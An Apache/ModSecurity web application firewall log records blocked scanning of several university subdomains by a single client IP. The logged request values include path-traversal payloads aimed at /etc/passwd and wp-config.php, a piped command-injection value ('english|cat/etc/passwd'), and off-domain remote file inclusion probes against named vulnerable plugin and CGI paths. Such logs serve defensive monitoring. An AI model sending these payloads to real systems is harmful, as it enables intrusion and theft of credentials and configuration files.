[Tue Aug 29 11:43:03.473505 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAdxUUMAAAAC"]
[Tue Aug 29 11:43:04.370695 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAcoNmcAAAAF"]
[Tue Aug 29 11:43:04.371587 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAeYbzgAAAAB"]
[Tue Aug 29 11:43:04.377171 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAXNuYwAAAAg"]
[Tue Aug 29 11:43:04.397277 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13WMCo-f0AAAdECdMAAAAW"]
[Tue Aug 29 11:43:04.404039 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAdTBDgAAAAY"]
[Tue Aug 29 11:43:04.424432 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAbo-gEAAAAi"]
[Tue Aug 29 11:43:04.429789 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAdb7nMAAAAb"]
[Tue Aug 29 11:43:04.471941 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAcoNmsAAAAF"]
[Tue Aug 29 11:43:04.474648 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAdTBDsAAAAY"]
[Tue Aug 29 11:43:04.480738 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAdxUUkAAAAC"]
[Tue Aug 29 11:43:04.482595 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAeYbzwAAAAB"]
[Tue Aug 29 11:43:05.391426 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WcCo-f0AAARpg4cAAAAU"]
[Tue Aug 29 11:43:05.397232 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WcCo-f0AAAdQ3j4AAAAV"]
[Tue Aug 29 11:43:06.404367 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAAc4EpAAAAAP"]
[Tue Aug 29 11:43:06.417418 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAAeChaIAAAAw"]
[Tue Aug 29 11:43:06.465733 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAAeChaQAAAAw"]
[Tue Aug 29 11:43:06.489069 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAARpg44AAAAU"]
[Tue Aug 29 11:43:06.503654 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAAeX1EcAAAAK"]
[Tue Aug 29 11:43:07.359422 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAARpg48AAAAU"]
[Tue Aug 29 11:43:07.363464 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAAdb7nwAAAAb"]
[Tue Aug 29 11:43:07.389511 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAAdftVoAAAAG"]
[Tue Aug 29 11:43:07.573247 2023] [:error] [pid 1967] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAAevkQoAAAAA"]
[Tue Aug 29 11:43:07.809718 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAAeX1EkAAAAK"]
[Tue Aug 29 11:43:08.052024 2023] [:error] [pid 1967] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13XMCo-f0AAAevkQsAAAAA"]
[Tue Aug 29 11:43:08.067222 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAAdOeUcAAAAS"]
[Tue Aug 29 11:43:08.533603 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAAdSZQEAAAAX"]
[Tue Aug 29 11:43:08.534966 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAAeYb0YAAAAB"]
[Tue Aug 29 11:43:08.537015 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAAeX1EwAAAAK"]
[Tue Aug 29 11:43:08.537046 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAAdftV4AAAAG"]
[Tue Aug 29 11:43:08.565542 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAAeYb0cAAAAB"]
[Tue Aug 29 11:43:08.565695 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAActbN0AAAAH"]
[Tue Aug 29 11:43:08.569115 2023] [:error] [pid 1967] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAAevkQ4AAAAA"]
[Tue Aug 29 11:43:08.593489 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAAdSZQMAAAAX"]
[Tue Aug 29 11:43:08.639838 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAAexH-AAAAAN"]
[Tue Aug 29 11:43:08.643173 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAActbOAAAAAH"]
[Tue Aug 29 11:43:09.374348 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAcsLJUAAAAE"]
